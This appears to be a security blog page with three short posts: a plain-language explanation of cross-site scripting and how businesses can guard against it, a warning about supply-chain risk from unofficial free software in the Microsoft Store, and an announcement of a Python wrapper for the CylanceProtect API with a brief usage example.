Cross Site Scripting Attacks On Your Company Website and How to Protect Against Them

Your business’ website and the domain (.com, .ca, .net, etc..) that goes along with it, is an important part of the identity of your organisation and is slowly becoming the first place that consumers will go to find out more about who you are and what you do. The last thing that you want, especially during an already strained moment in the world’s economy, is for a potential client to receive an ad or get redirected to another website when visiting yours.

Cross-site Scripting Vulnerability
There are many ways for an attacker to take advantage of you through your website including a technique called Cross-Site Scripting or XSS for short-hand. A XSS vulnerability allows an attacker to insert (or inject) a piece of code into your website. One intended result from this action is that the code is then displayed to your visitors in the form of ads, malware, or just about anything else. In effect, the attacker is using your website as a median to deliver malicious content to unsuspecting visitors.

A XSS vulnerability exists when an input on your website doesn’t properly validate or sanitize the data given to it prior to that data being used in an output. These inputs might include contact forms, shopping carts, and login forms. Essentially, any point of data entry on your website can be the target of a XSS attack.

Protecting Against XSS Vulnerabilities
The most effective manor of protecting against a XSS vulnerability is by not allowing your visitors to use any special characters (<,>,/,\,,,!,&,etc) when entering data on your website. HTML encoding is the most common method for ensuring that HTML characters are converted output in safer manner. XSS vulnerabilities can be identified during development by using both Static and Dynamic Application Security Testing (DAST) techniques, and should be remediated prior to pushing code to production.

Many websites, including this one, rely on a Content Management System (CMS) to manage and display content. WordPress and Drupal are just a couple of examples of what a CMS is. When using a CMS you willl rely on plug-ins to provide functionality like contact forms, and while you can’t know with 100% certainty what security controls were used in the development of the plug-in, you do have the ability to keep them updated with the latest software patches. Your CMS will allow you to update your plug-ins through its distinct administration dashboard. WordPress 3.7 introduced the capability to turn automatic update plug-ins, but it needs to be turned on!

OWASP – Cross Site Scripting (XSS)

How Hackers Use Free Software To Spread Malware

Bad Microsoft Store Downloads

In a world where the Covid-19 virus is dominating and forcing businesses to shudder or employees to work from home, technology companies are stepping up in a big way to offer many of their services and products at reduced or no cost. This has made the forced transition to a primarily remote work force easier in so many regards, but it also adds an element of risk that some companies aren’t necessarily thinking about these days and I can’t blame them.

To understand the risk that software plays, it’s important to understand the multitude of ways that a bad actor can take advantage of companies offering free software to spread malware and possibly steal your data. When we talk about this type of risk we’re often talking about third-party risk. It’s third-party because you often don’t have the same control over the software as something that you might have developed in house.

Understanding the Software Supply-Chain

If you look at any piece of enterprise software in 2020 it will almost certainly be built with a number of frameworks like .NET, Node JS, and Ruby on Rails. These frameworks can save thousands of hours of development time by providing libraries of predefined code. In using these frameworks, you are likely NOT reviewing the code yourself, but are relying on the developers of these libraries to ensure that vulnerabilities don’t exist in their code.

A physical example of a supply-chain attack was the Target breach. A bad actor was able to take advantage of a flaw in the software of Target’s HVAC vendor. The vendor software that was running on the Target network had a vulnerability that allowed the bad actor to enter the network. Once inside the network they only need to find a way to move laterally to more important computers with more important information on them.

Free Software Makes Supply-Chain Attacks Easier

I love free software as much as the next guy, just make sure that you’re getting it from an appropriate source. A quick search on the very own Microsoft Store brought up a number of free software that was being peddled for cash (seen in the picture above). These are NOT official releases of this software, but they are certainly easier to access for any Windows user then the official. Here are the actual and safe links, for your information.

There is simply no guarantee that the above publisher didn’t modify the software in some way that could track you, or steal data. In so many cases these publishers use Adware to make a quick buck.

Protecting Yourself

  • Track any third-party code or relationships to ensure that security releases are applied when appropriate. This might be as simple as an Excel spreadsheet or as complex as an entire third-party risk management department.
  • Always download software from official sources. A quick Google search of the software will often bring up the appropriate website as the first result.
  • Eliminate the human factor by providing employees with security awareness training on a regular basis.

CylanceProtect API Wrapper in Python3

Open Source

CylanceProtect is an artificial intelligence based anti-virus solution that is now owned by Blackberry.

A few years ago I wrote a Python3 wrapper for the CylanceProtect API. It’s not well testing, but fairly well documented. Feel free to check it out on Github and modify it as you see fit.

CyPyAPI was designed as an object oriented class so you’ll simply need to instantiate the object with the required connection settings, and then call whatever methods that you wish.

import cypyapi

# Create a new CyPyAPI object
cypiapi_object = CyPyApi(Tenant_ID, App_ID, App_Secret)

# Now call whatever method that you wish.
users = cypiapi_object.get_users()

It’s as simple as that.

Check out the code over on GitHub.